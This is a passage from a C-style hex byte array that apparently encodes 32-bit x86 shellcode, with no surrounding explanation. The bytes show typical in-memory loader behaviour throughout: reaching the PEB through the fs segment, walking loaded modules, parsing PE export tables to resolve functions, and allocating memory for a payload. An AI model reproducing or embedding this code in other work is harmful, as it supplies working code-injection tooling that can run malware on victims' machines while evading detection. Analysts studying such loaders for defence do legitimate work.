25 0x00, 0x00, 0x00, 0xeb, 0x07, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xeb, 0x7d,
26 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x74, 0x83, 0x7d, 0xe0, 0x00, 0x74, 0x6e,
27 0xc7, 0x85, 0x0c, 0xfd, 0xff, 0xff, 0x07, 0x00, 0x01, 0x00, 0x8b, 0x45,
28 0xe0, 0xff, 0xd0, 0x8d, 0x95, 0x0c, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24,
29 0x04, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xd8, 0xff, 0xd0, 0x83, 0xec, 0x08,
30 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x80, 0x08,
31 0x02, 0x00, 0x00, 0x89, 0x85, 0xc4, 0xfd, 0xff, 0xff, 0x8b, 0x85, 0xd0,
32 0xfd, 0xff, 0xff, 0x83, 0xe0, 0xfc, 0x89, 0x85, 0xd0, 0xfd, 0xff, 0xff,
33 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0xfd,
34 0xff, 0xff, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xdc, 0xff, 0xd0, 0x83, 0xec,
35 0x08, 0xeb, 0x0b, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0a, 0x00,
36 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8d, 0x65, 0xf8, 0x5b, 0x5e, 0x5d, 0xc3,
37 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x81, 0xec, 0xbc, 0x01, 0x00, 0x00,
38 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x4c, 0x8b, 0x40, 0x48, 0x89, 0x45, 0xd0,
39 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28,
40 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b,
41 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45,
42 0x08, 0x89, 0x04, 0x24, 0xe8, 0x3d, 0x10, 0x00, 0x00, 0x89, 0x45, 0xcc,
43 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x54, 0x8b, 0x40, 0x50, 0x89, 0x45, 0xd0,
44 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28,
45 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b,
46 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45,
47 0x08, 0x89, 0x04, 0x24, 0xe8, 0x01, 0x10, 0x00, 0x00, 0x89, 0x45, 0xc8,
48 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xc4, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xc0,
49 0x01, 0x00, 0x00, 0x89, 0x45, 0xd0, 0x89, 0x55, 0xd4, 0x8b, 0x45, 0x08,
50 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54,
51 0x24, 0x10, 0x8b, 0x45, 0xd0, 0x8b, 0x55, 0xd4, 0x89, 0x44, 0x24, 0x04,
52 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xbf,
53 0x0f, 0x00, 0x00, 0x89, 0x45, 0xc4, 0x83, 0x7d, 0xcc, 0x00, 0x74, 0x0c,
54 0x83, 0x7d, 0xc8, 0x00, 0x74, 0x06, 0x83, 0x7d, 0xc4, 0x00, 0x75, 0x0a,
55 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x8d, 0x07, 0x00, 0x00, 0x8b, 0x45,
56 0x08, 0x8b, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0xc7,
57 0x44, 0x24, 0x08, 0x00, 0x30, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0xc7,
58 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0xff, 0xd0, 0x83,
59 0xec, 0x10, 0x89, 0x45, 0xc0, 0x83, 0x7d, 0xc0, 0x00, 0x75, 0x27, 0x8b,
60 0x45, 0x08, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75,
61 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xc4, 0xff,
62 0xd0, 0x83, 0xec, 0x04, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x35, 0x07,
63 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b,
64 0x45, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0xc0, 0x89, 0x04, 0x24,
65 0xe8, 0x61, 0x51, 0x00, 0x00, 0x8b, 0x45, 0xc0, 0x89, 0x45, 0x08, 0xc7,
66 0x44, 0x24, 0x08, 0x20, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00,
67 0x00, 0x00, 0x00, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24,
68 0xe8, 0x0f, 0x51, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x04, 0x02,
69 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x9e, 0x00, 0x00, 0x00, 0x8b,
70 0x45, 0x08, 0x05, 0x10, 0x02, 0x00, 0x00, 0x89, 0x45, 0xbc, 0x8b, 0x45,
71 0x08, 0x8b, 0x00, 0x8d, 0x88, 0xf0, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x08,
72 0x8d, 0x58, 0x14, 0x8b, 0x45, 0x08, 0x8d, 0x50, 0x04, 0x89, 0x4c, 0x24,
73 0x0c, 0x8b, 0x45, 0xbc, 0x89, 0x44, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
74 0x89, 0x14, 0x24, 0xe8, 0xae, 0x5b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
75 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x8b, 0x4d, 0x08, 0x81, 0xc1, 0x00, 0x0c,
76 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x89, 0x0c,
77 0x24, 0xe8, 0x78, 0x58, 0x00, 0x00, 0x89, 0x45, 0xb0, 0x89, 0x55, 0xb4,
78 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x04, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x00,
79 0x0d, 0x00, 0x00, 0x89, 0xc3, 0x33, 0x5d, 0xb0, 0x89, 0x9d, 0x60, 0xfe,
80 0xff, 0xff, 0x89, 0xd0, 0x33, 0x45, 0xb4, 0x89, 0x85, 0x64, 0xfe, 0xff,
81 0xff, 0x8b, 0x8d, 0x60, 0xfe, 0xff, 0xff, 0x8b, 0x9d, 0x64, 0xfe, 0xff,
82 0xff, 0x89, 0xd8, 0x09, 0xc8, 0x85, 0xc0, 0x0f, 0x85, 0xf3, 0x04, 0x00,
83 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x48, 0x28, 0x8b, 0x58, 0x2c, 0x8b, 0x45,
84 0x08, 0x8b, 0x50, 0x34, 0x8b, 0x40, 0x30, 0x89, 0x4c, 0x24, 0x0c, 0x89,
85 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b,
86 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x2c, 0x0e, 0x00, 0x00, 0x8b, 0x55,
87 0x08, 0x89, 0x42, 0x30, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x30, 0x85, 0xc0,
88 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xff, 0x05, 0x00, 0x00,
89 0x8b, 0x45, 0x08, 0x05, 0x14, 0x02, 0x00, 0x00, 0x89, 0x45, 0xdc, 0xc7,
90 0x45, 0xe4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xdc, 0x8b,
91 0x45, 0xe4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x74, 0xfe, 0xff,
92 0xff, 0x8b, 0x55, 0xe4, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xe4, 0x01,
93 0x8b, 0x55, 0xdc, 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
94 0xc0, 0x74, 0x18, 0x8b, 0x55, 0xdc, 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0x0f,
95 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x09, 0x81, 0x7d, 0xe4, 0x03, 0x01, 0x00,
96 0x00, 0x76, 0xbd, 0x83, 0x7d, 0xe4, 0x00, 0x74, 0x2e, 0x8b, 0x45, 0xe4,
97 0x83, 0xc0, 0x01, 0x01, 0x45, 0xdc, 0x8d, 0x95, 0x74, 0xfe, 0xff, 0xff,
98 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8d, 0x85, 0x74, 0xfe,
99 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
100 0xe8, 0xeb, 0x08, 0x00, 0x00, 0xeb, 0x80, 0x90, 0xc7, 0x45, 0xe4, 0x01,
101 0x00, 0x00, 0x00, 0xe9, 0x96, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
102 0x48, 0x28, 0x8b, 0x58, 0x2c, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83,
103 0xc2, 0x06, 0x8d, 0x14, 0xd0, 0x8b, 0x02, 0x8b, 0x52, 0x04, 0x89, 0x4c,
104 0x24, 0x0c, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54,
105 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x45, 0x0d, 0x00,
106 0x00, 0x8b, 0x55, 0x08, 0x8b, 0x4d, 0xe4, 0x83, 0xc1, 0x0c, 0x89, 0x04,
107 0x8a, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83, 0xc2, 0x0c, 0x8b, 0x04,
108 0x90, 0x85, 0xc0, 0x75, 0x41, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x7c, 0x01,
109 0x00, 0x00, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x89, 0x45, 0xd0, 0x89,
110 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83, 0xc2, 0x06, 0x8d,
111 0x14, 0xd0, 0x8b, 0x02, 0x8b, 0x52, 0x04, 0x89, 0xc3, 0x33, 0x5d, 0xd0,
112 0x89, 0xde, 0x89, 0xd0, 0x33, 0x45, 0xd4, 0x89, 0xc7, 0x89, 0xf8, 0x09,
113 0xf0, 0x85, 0xc0, 0x0f, 0x85, 0x86, 0x03, 0x00, 0x00, 0x90, 0x83, 0x45,
114 0xe4, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x10, 0x02, 0x00, 0x00, 0x39,
115 0x45, 0xe4, 0x0f, 0x82, 0x58, 0xff, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b,
116 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x21, 0x8b, 0x45,
117 0x08, 0x89, 0x04, 0x24, 0xe8, 0x5c, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x0f,
118 0x84, 0x51, 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d,
119 0x00, 0x00, 0x89, 0x45, 0xe0, 0xeb, 0x2b, 0x8b, 0x45, 0x08, 0x8b, 0x80,
120 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x34, 0x03, 0x00,
121 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8,
122 0x01, 0x75, 0x0b, 0x8b, 0x45, 0x08, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x89,
123 0x45, 0xe0, 0xc7, 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44,
124 0x24, 0x08, 0x00, 0x30, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0xa4, 0x0f,
125 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc,
126 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0xba,
127 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x89, 0x81, 0xf8, 0x01, 0x00,
128 0x00, 0x89, 0x91, 0xfc, 0x01, 0x00, 0x00, 0x83, 0x7d, 0xd8, 0x00, 0x75,
129 0x27, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8,
130 0x02, 0x75, 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
131 0xc4, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9,
132 0xf7, 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00,
133 0x00, 0x83, 0xf8, 0x01, 0x74, 0x72, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
134 0xe8, 0x82, 0x47, 0x00, 0x00, 0x89, 0x45, 0xac, 0x83, 0x7d, 0xac, 0x00,
135 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83,
136 0xf8, 0x02, 0x0f, 0x84, 0x7c, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x89,
137 0x04, 0x24, 0xe8, 0xa2, 0x49, 0x00, 0x00, 0x89, 0x45, 0xac, 0x83, 0x7d,
138 0xac, 0x00, 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00,
139 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x8b, 0x45,
140 0x08, 0x89, 0x04, 0x24, 0xe8, 0x86, 0x49, 0x00, 0x00, 0x89, 0x45, 0xac,
141 0x83, 0x7d, 0xac, 0x00, 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44,
142 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0x36, 0x02, 0x00, 0x00,
143 0x8b, 0x45, 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x5b,
144 0x01, 0x00, 0x00, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
145 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x05, 0x2f,
146 0x15, 0x00, 0x00, 0x25, 0x00, 0xf0, 0xff, 0xff, 0x89, 0x85, 0x70, 0xfe,
147 0xff, 0xff, 0x8b, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24,
148 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x00,
149 0x00, 0x8d, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7,
150 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x78, 0xff, 0xff,
151 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
152 0xe8, 0x8b, 0x53, 0x00, 0x00, 0x89, 0x45, 0xa8, 0x83, 0x7d, 0xa8, 0x00,
153 0x0f, 0x88, 0xbb, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
154 0xc7, 0x44, 0x24, 0x08, 0x30, 0x05, 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x89,
155 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0x23, 0x4d, 0x00, 0x00, 0x8b,
156 0x45, 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x03, 0x74, 0x0f, 0x8b, 0x45,
157 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x04, 0x0f, 0x85, 0x81, 0x00, 0x00,
158 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x04, 0x01, 0x00, 0x00, 0x8b, 0x45,
159 0xe0, 0x8b, 0x98, 0x20, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x05, 0x28,
160 0x05, 0x00, 0x00, 0x89, 0x85, 0x60, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xe0,
161 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
162 0x8d, 0xb8, 0x28, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x40, 0x08,
163 0x83, 0xe8, 0x01, 0x80, 0xcc, 0x01, 0x0f, 0xb7, 0xc0, 0x8d, 0x75, 0x9c,
164 0x89, 0x74, 0x24, 0x14, 0x89, 0x5c, 0x24, 0x10, 0x8b, 0xb5, 0x60, 0xfe,
165 0xff, 0xff, 0x89, 0x74, 0x24, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x89, 0x7c,
166 0x24, 0x04, 0x89, 0x04, 0x24, 0xff, 0xd2, 0x83, 0xec, 0x18, 0x89, 0x45,
167 0xa4, 0x83, 0x7d, 0xa4, 0x00, 0x0f, 0x85, 0x11, 0x01, 0x00, 0x00, 0x8b,
168 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x45, 0xe0, 0xeb, 0x34, 0x8b, 0x45,
169 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x02, 0x75, 0x29, 0x8b, 0x85, 0x78,
170 0xff, 0xff, 0xff, 0x8d, 0x90, 0x28, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0,
171 0x05, 0x28, 0x05, 0x00, 0x00, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24,
172 0xe8, 0xbd, 0x49, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89,
173 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0a,
174 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x04, 0x75, 0x17, 0x8b, 0x45,
175 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
176 0xd0, 0x1d, 0x00, 0x00, 0xe9, 0xab, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0,
177 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0a, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
178 0x83, 0xf8, 0x02, 0x75, 0x53, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89,
179 0x44, 0x24, 0x08, 0x8b, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
180 0x08, 0x89, 0x04, 0x24, 0xe8, 0xcc, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x74,
181 0x1c, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8b,
182 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
183 0xe8, 0xbe, 0x15, 0x00, 0x00, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89,
184 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x9f, 0x1b,
185 0x00, 0x00, 0xeb, 0x44, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x05,
186 0x74, 0x0a, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x2f,
187 0x8b, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04,
188 0x24, 0xe8, 0x1c, 0x34, 0x00, 0x00, 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90,
189 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90,
190 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90,
191 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02,
192 0x74, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83,
193 0xf8, 0x03, 0x0f, 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
194 0x80, 0x30, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x77, 0x8b, 0x45, 0x08,
195 0x8b, 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00,
196 0x89, 0xc2, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x89,
197 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89,
198 0x04, 0x24, 0xe8, 0xf5, 0x4a, 0x00, 0x00, 0xc7, 0x85, 0x70, 0xfe, 0xff,
199 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8d, 0x90, 0x30, 0x0d,
200 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
201 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89,
202 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
203 0xff, 0xff, 0xe8, 0x40, 0x51, 0x00, 0x00, 0x8b, 0x45, 0x08, 0xc7, 0x80,
204 0x30, 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
205 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x94, 0xc0, 0x0f,
206 0xb6, 0xc0, 0x89, 0x45, 0xa0, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x89, 0x44,
207 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
208 0x08, 0x89, 0x04, 0x24, 0xe8, 0x7b, 0x4a, 0x00, 0x00, 0x8b, 0x45, 0x08,
209 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
210 0xc7, 0x44, 0x24, 0x08, 0x00, 0xc0, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04,
211 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xc8, 0xff, 0xd0,
212 0x83, 0xec, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0xc0, 0x00, 0x00, 0xc7,
213 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x89, 0x04,
214 0x24, 0x8b, 0x45, 0xc8, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0x7d, 0xa0,
215 0x00, 0x74, 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
216 0xc4, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x8d,
217 0x65, 0xf4, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec,
218 0x28, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x14, 0x00,
219 0x01, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x89, 0x54, 0x24, 0x10, 0xc7, 0x44,
220 0x24, 0x0c, 0xff, 0xff, 0xff, 0xff, 0x8b, 0x55, 0x0c, 0x89, 0x54, 0x24,
221 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
222 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x18, 0xc9, 0xc3, 0x55,
223 0x89, 0xe5, 0x83, 0xec, 0x38, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
224 0xc7, 0x45, 0xdc, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xdc, 0x64, 0x8b,
225 0x00, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x30, 0x89, 0x45,
226 0xec, 0x8b, 0x45, 0xec, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45,
227 0xe8, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf4, 0xeb, 0x40, 0x8b, 0x45, 0xf4,
228 0x8b, 0x40, 0x18, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x3b, 0x45, 0x0c,
229 0x74, 0x26, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
230 0x14, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0xe4, 0x89, 0x44, 0x24, 0x04,
231 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x68, 0x00, 0x00, 0x00, 0x89,
232 0x45, 0xf0, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x45,
233 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x06, 0x83,
234 0x7d, 0xf0, 0x00, 0x74, 0xb0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x3f, 0x8b,
235 0x45, 0x10, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
236 0xe8, 0x8b, 0x02, 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00,
237 0x74, 0x1d, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x34, 0x8b, 0x55, 0x14, 0x89,
238 0x54, 0x24, 0x04, 0x8b, 0x55, 0xe0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
239 0xec, 0x08, 0x89, 0x45, 0xf0, 0xeb, 0x07, 0xc7, 0x45, 0xf0, 0x00, 0x00,
240 0x00, 0x00, 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec,
241 0xd8, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x83,
242 0x7d, 0x0c, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x37,
243 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8,
244 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45,
245 0xe4, 0x8b, 0x45, 0xe4, 0x83, 0xc0, 0x78, 0x89, 0x45, 0xe0, 0x8b, 0x45,
246 0xe0, 0x8b, 0x00, 0x89, 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00, 0x75, 0x0a,
247 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x00, 0x02, 0x00, 0x00, 0x8b, 0x55,
248 0x0c, 0x8b, 0x45, 0xdc, 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8,
249 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd4, 0x8b,
250 0x45, 0xd8, 0x8b, 0x50, 0x20, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45,
251 0xd0, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x24, 0x8b, 0x45, 0x0c, 0x01, 0xd0,
